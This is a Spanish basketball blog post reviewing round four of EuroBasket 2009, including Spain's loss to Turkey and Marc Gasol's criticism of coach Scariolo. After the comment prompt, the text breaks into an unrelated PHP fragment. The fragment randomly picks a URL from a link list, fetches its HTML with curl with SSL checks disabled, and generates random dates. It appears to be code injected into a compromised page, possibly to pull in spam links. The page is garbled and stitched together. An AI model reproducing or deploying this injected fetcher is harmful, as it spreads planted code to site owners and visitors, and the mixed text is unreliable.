EuroNBAsket: Jornada 4

13 de September de 2009 por txusma

Ya se han jugado los primeros partidos de la segunda fase y podríamos decir que se han confirmado las impresiones de la primera parte de la competición. En el grupo E, una Francia en plan rodillo pasó por encima de Macedonia sin ningún tipo de contemplaciones mientras que griegos y rusos tuvieron que sudar un poco más para ganar a croatas y alemanes respectivamente. En el grupo F, Eslovenia apalizó a una Lituania que tiene las maletas hechas desde hace ya unos días y para la que cada partido es como un tormento, mientras que Serbia le ganó a Polonia un partido igualadísimo de la mano de un Krstic que se las vio con Gortat. Precioso duelo el suyo.

¿Y qué decir de España? Pues que en el partido de ayer se confirmó que nuestra selección está muy lejos de su mejor versión y que Turquía apunta muy alto. España jugó a rachas, mejorando en defensa pero sin sistemas claros de ataque. El juego ofensivo parece totalmente desorganizado y dependiente en exceso de la calidad de unos jugadores que no están en sus mejores días. De hecho, sólo Rudy Fernández dio realmente la cara en el partido de ayer. Enfrente una Turquía muy seria que supo sobreponerse al mal partido de Turkoglu con un gran juego de conjunto liderado por Asik y Erden, que se comieron con patatas a nuestro juego interior, e Ilyasova. Incluso Tunceri aportó cuando más lo necesitaba su equipo. Aún así, España llegó viva a la última jugada donde el balón fue, de manera sorprendente, para Sergio Llull cuando en cancha estaban Rudy, Navarro o Pau. Llull falló el intento de mate y el partido se fue por el agujero del retrete.

Pero lo peor estaba por llegar. Unas declaraciones de Marc Gasol criticando claramente a Scariolo y mostrándose despectivo con un compañero de equipo, demuestran que el ambiente no es el mejor y que ni los más optimistas pueden pensar que España vaya a hacer algo importante en este europeo. Sin los jugadores en su mejor estado de forma, sin ningún tipo de idea para atacar en estático, y sin confianza ninguna entre jugadores y entrenador, España se enfrentará mañana a Lituania. Será sin duda, un partido de tristes.

MVP: No sólo por su actuación (18 puntos, 8 rebotes y 2 tapones) sino por conseguirla delante del pívot más en forma de la competición, está claro que Nenad Krstic se merece nuestro premio.

Sorpresa: El otro día le dimos caña a Nicolas Batum pero frente Macedonía se marcó un buen partido. 13 puntitos y 5 rebotes para él.

Decepción: Aún aportando en otras facetas del juego, 2 puntos son poquísimos para la mayor amenaza de Turquía. Turkoglu tuvo un muy mal día pero aún así su equipo fue capaz de ganar el partido.

El mayor esfuerzo en vano: El de Marcin Gortat en la derrota de Polonia frente a Serbia. España va directa a jugarse la clasificación con los polacos y viendo el estado de forma del pívot de Orlando, no es para dormir muy tranquilos.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>